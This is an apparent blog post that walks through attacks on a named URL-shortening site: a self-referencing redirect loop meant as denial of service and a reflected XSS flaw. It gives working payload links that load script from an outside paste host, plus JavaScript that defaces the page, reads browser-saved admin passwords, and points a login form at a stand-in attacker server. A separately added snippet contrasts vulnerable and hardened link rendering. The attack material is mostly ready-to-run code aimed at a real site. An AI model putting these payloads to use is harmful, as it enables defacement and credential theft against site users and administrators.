Ok, first I discovered that I can shrink links to the website itself, so an evil idea came to my mind: a DoS attack. I wanted to make the webserver loop infinitely trying to resolve the link. For example, I shortened the URL http://shr1nk.me/1235 and pointed it to http://shr1nk.me/1234, and vice versa.
Now to XSS. A simple check shows that the website is XSS'able; here's a simple alert() test: http://shr1nk.me/index.php?url="></a><script>alert(1)</script>. It doesn't work for me in Google Chrome, so use Firefox.
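As an added example (not code from the original post or from shr1nk.me), here is a minimal model of why the url= parameter above is dangerous and what the server-side fix looks like: the vulnerable version drops the raw parameter into an href attribute, while the hardened version accepts only http/https URLs and HTML-encodes the value before rendering it. Function names such as renderSafe are assumptions.

```javascript
// Vulnerable model of index.php?url=...: the raw parameter is interpolated into
// an href attribute, so a value starting with "> closes the attribute and the <a>.
function renderVulnerable(url) {
  return '<a href="' + url + '">' + url + '</a>';
}

// Encode the characters that can break out of an attribute or a text node.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  })[c]);
}

// Accept only absolute http(s) URLs: rejects javascript:, data: and schemeless input.
function isSafeHttpUrl(url) {
  let parsed;
  try { parsed = new URL(url); } catch (e) { return false; }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:';
}

// Hardened model: validate first, then output-encode for the attribute and text contexts.
function renderSafe(url) {
  if (!isSafeHttpUrl(url)) {
    return '<p>Invalid URL</p>';
  }
  const safe = escapeHtml(url);
  return '<a href="' + safe + '">' + safe + '</a>';
}
```

Pass the exact payload from the test link above to both renderers to see the difference: the vulnerable one emits a live script tag, the hardened one rejects the input, and a payload hidden behind a valid scheme comes out entity-encoded.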
Let's explore three categories of attacks that can be carried out using XSS; of course, combining these techniques has a bigger impact.
Reputation:
We can make a website's reputation as bad as we want by inserting inappropriate content, posting false news, etc. Remember! Users have to click your link to see this, because it is not a persistent XSS attack. For example, if you click this link http://shr1nk.me/index.php?url=%22%3E%3C/a%3E%3Cscript%20src=http://pastie.org/868120.txt%3E%3C/script%3E, you should get something like this:
```javascript
// Write some annoying messages
var b = document.getElementById('contenu');
var s = "<h1>You freeking -stupid- visitors, get lost from here (just an example) ok!</h1>";
b.innerHTML = s + "<img src='some evil pirate image here'/>";
```
Password Theft:
I have explained this in detail here http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html, and here is a simple customized version of how to steal the admin passwords transparently if they are saved by the browser. The victim just has to click the link and boom! http://shr1nk.me/index.php?url=%22%3E%3C/a%3E%3Cscript%20src=http://pastie.org/868131.txt%3E%3C/script%3E
```javascript
var frameset = document.createElement('frameset');
var frame1 = document.createElement('frame');
document.body.appendChild(frameset);
frame1.setAttribute('src', 'admin/');
frameset.appendChild(frame1);
function showLogin()
{
  alert('login : ' + parent.frames[0].document.getElementById('username').value +
        '\npass : ' + parent.frames[0].document.getElementById('password').value);
}
setTimeout(showLogin, 1000);
// here, send the logins to the attacker's server using XHR
```
Trapping the victim into submitting his logins:
This uses the same technique as the password theft. When combined with the previous one it becomes very dangerous, unless the user is aware of how XSS works, has an XSS blocker like NoScript, or is using IE8. The idea is to show the victim a login page and change the action of the form to point to the attacker's server rather than the real login page; a simple attack would be exploited like this:
```javascript
var frameset = document.createElement('frameset');
var frame1 = document.createElement('frame');
document.body.appendChild(frameset);
frame1.setAttribute('src', 'admin/');
frameset.appendChild(frame1);
// HERE make the faked iFrame stretched to hide the real page
// using the style attribute
// Now change the action of the form to point to the attacker's server
// or do it using XHR, then submit the form to its real action
parent.frames[0].document.forms[0].action = "http://evil_server.com/intercept_passwords.aspx";
// here, send the logins to the attacker's server using XHR
```
I'm aware this was not detailed enough, but the subject is really vast, so if you plan to learn XSS, start by applying simple attacks like the first and second listed here (you have working source code). Then you will start to see clearly how some advanced attacks, like the last one, are exploited. I also advise this book: http://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/1597491543.